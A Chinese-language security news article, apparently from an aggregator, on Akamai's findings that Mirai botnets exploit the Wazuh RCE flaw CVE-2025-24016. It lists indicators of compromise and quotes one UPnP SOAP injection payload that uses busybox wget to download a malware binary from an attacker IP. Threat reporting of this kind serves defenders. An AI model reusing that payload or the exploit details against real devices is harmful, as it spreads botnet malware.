安全客 前天 13:30
重要的 Wazuh RCE (CVE-2025-24016) 被 Mirai 僵尸网络积极利用
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

Akamai SIRT 团队发现,Wazuh 服务器中的关键远程代码执行 (RCE) 漏洞 CVE-2025-24016 正被 Mirai 僵尸网络积极利用。该漏洞允许远程攻击者通过 Wazuh 分布式 API 中未经处理的 JSON 输入执行任意 Python 代码。自 2025 年 2 月首次披露以来,该漏洞已被用于针对物联网设备和意大利用户,涉及多个 Mirai 恶意软件变种。攻击活动包括下载和执行恶意 shell 脚本,以及使用意大利风格的域名。此外,这些僵尸网络还利用了其他已知漏洞,凸显了攻击者针对暴露和过时基础设施的自动化攻击。

🛡️ CVE-2025-24016 漏洞:Wazuh 服务器中一个关键的远程代码执行 (RCE) 漏洞,CVSS 评分为 9.9,允许攻击者通过未经处理的 JSON 输入执行任意 Python 代码。该漏洞源于 Wazuh 在 Python 中使用 as_Wazuh_object() 方法,该方法无法对字典输入进行消毒。

👾 Mirai 僵尸网络利用:Akamai 发现了两个不同的僵尸网络活动利用此漏洞。第一个是“morte”,属于 LZRD Mirai 家族,针对物联网设备,下载并执行恶意 shell 脚本。第二个是“Resbot”,使用意大利风格的域名,可能针对意大利语用户,其C2通过TCP端口62627硬编码。

🌐 攻击基础设施:报告中提供了与这些僵尸网络活动相关的 C2 域名、有效载荷服务器和其他域名。例如,“morte”的 C2 域名为 nuklearcnc.duckdns[.]org,有效载荷服务器为 176.65.134[。62;“Resbot”的 C2 通过 TCP 端口 62627 硬编码为 104.168.101[.]27。

⚠️ 历史漏洞的结合利用:除了 CVE-2025-24016,这些僵尸网络还利用了过去几年的其他漏洞,包括 CVE-2023-1389 (TP-Link)、CVE-2017-17215 (华为 HG532) 和 CVE-2017-18368 (D-Link),以及针对 Ivanti、UPnP 和 YARN API 的开发。

Akamai 的安全智能和响应团队 (SIRT) 发现了 CVE-2025-24016 的主动利用,这是 Wazuh 服务器中一个关键的远程代码执行 (RCE) 漏洞,由多个基于 Mirai 的僵尸网络使用。该漏洞的CVSS得分为9.9,允许远程攻击者通过Wazuh Distributed API中未经消毒的JSON输入执行任意Python代码。

“这是自2025年2月首次披露以来首次报告积极利用此漏洞,”Akamai在报告中写道。

CVE-2025-24016于2025年2月披露,影响Wazuh版本4.4.0至4.9.0,并允许攻击者通过向/security/user/authenticate/run_as端点制作恶意run_as请求来实现RCE。

该漏洞源于Wazuh在Python中使用as_Wazuh_object()去序列化方法,该方法无法对字典输入进行消毒。

“这可以通过向DAPI请求注入未经消毒的字典来利用,这可能导致对任意Python代码的评估,”报告解释说。

Akamai 利用此漏洞识别了两个不同的僵尸网络活动,两者都使用 Mirai 恶意软件的变体。

第一波浪潮出现在2025年3月初,在CVE公开披露后不久,针对物联网设备提供一套特定于架构的二进制文件。被称为“morte”的恶意软件是LZRD Mirai家族的一部分,以其控制台字符串“lzrd here”而闻名。

“漏洞利用获取并执行恶意shell脚本,作为主要Mirai恶意软件有效载荷的下载器,”报告解释说。

相关基础设施包括:

①C2 Domain: nuklearcnc.duckdns[.]org

②有效载荷服务器:176.65.134[。62

③附加域名: cbot.galaxias[.]cc, neon.galaxias [.]cc, pangacnc[.]com

 

2025 年 5 月,Akamai 观察到第二个僵尸网络被称为“Resbot”,它利用了相同的漏洞,但使用了 gestisciweb.com 等意大利风格的域名,建议针对讲意大利语的用户。

恶意软件“resgod”打印控制台字符串“Resentual get you!执行时,还针对多个 CPU 架构。其C2通过TCP端口62627硬编码为104.168.101[.]27。

“它使用各种域来传播恶意软件,这些恶意软件都具有意大利术语……可能暗指受影响的设备所有者所说的目标地理或语言,”报告指出。

除了CVE-2025-24016之外,还观察到僵尸网络与过去几年的漏洞利用有关,包括:

①CVE-2023-1389(TP-Link)

②CVE-2017-17215(华为HG532)

③CVE-2017-18368(D-Link)

④针对 Ivanti、UPnP 和 YARN API 的开发

通过 SOAP 为 UPnP 利用专门制作的一个攻击字符串包含此有效载荷:

<NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>

这些行动强调了资源充足和自动化的进攻性攻势,以损害暴露和过时的基础设施。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Wazuh RCE漏洞 Mirai僵尸网络 CVE-2025-24016 网络安全
相关文章